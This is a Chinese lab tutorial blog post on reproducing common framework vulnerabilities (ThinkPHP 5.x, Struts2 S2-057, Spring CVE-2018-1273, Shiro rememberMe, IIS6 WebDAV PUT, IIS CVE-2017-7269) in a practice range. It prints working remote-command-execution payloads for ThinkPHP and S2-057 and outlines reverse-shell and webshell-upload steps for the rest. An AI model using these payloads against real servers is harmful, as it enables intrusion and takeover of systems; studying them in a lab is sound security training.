常见框架漏洞

一、Thinkphp5x远程命令执⾏及getshell

1、开启靶场环境,打开网站

2、远程命令执⾏

?s=index/think\app/invokefunction&function=call_user _func_array&vars[0]=system&vars[1][]=whoami

3、 远程代码执⾏

?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

二、S2-057远程执⾏代码漏洞(vulhub 靶场 /struts2/s2-057)

1、开启靶场环境,打开网站,访问靶机地址 /struts2-showcase/

2、在url处输⼊http://172.16.1.48/struts2 showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。

3、将 上⾯验证payload的值修改为我们的利⽤exp

$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23 request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.o pensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getIns tance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcl udedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.cle ar%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Run time@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.I OUtils@toString%28%23a.getInputStream%28%29%29%29%7D

三、spring 代码执⾏ (CVE-2018-1273)

1、开启靶场环境,打开网站 访问/users

2、填写注册信息,bp抓包,加 上 poc :

3、进⼊终端查看,可以看到成功写⼊

4、反弹shell

 

四、Shiro rememberMe反序列化漏洞(vulhub 靶场 /shiro/CVE-2016-4437)

1、开启靶场环境,打开网站,使用bp抓包查看,验证Shiro框架

2、利⽤⼯具,命令执⾏

3、反弹shell

五、IIS6.x篇 PUT漏洞

1、打开虚拟机,开启 WebDAV 和写权限,⽤burpsuite 提交OPTIONS 查看⽀持的协议

2、⽤PUT上传⽂档,但不能直接上传⽅法脚本⽂档,可以先上传⼀个其他类型的⽂档,然后移动成 脚本⽂档

3、使⽤MOVE命令将其更名为脚本⽂档后缀,使用工具连接查看

 

六、IIS RCE-CVE-2017-7269

1、开启靶场环境,使用工具反弹shell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值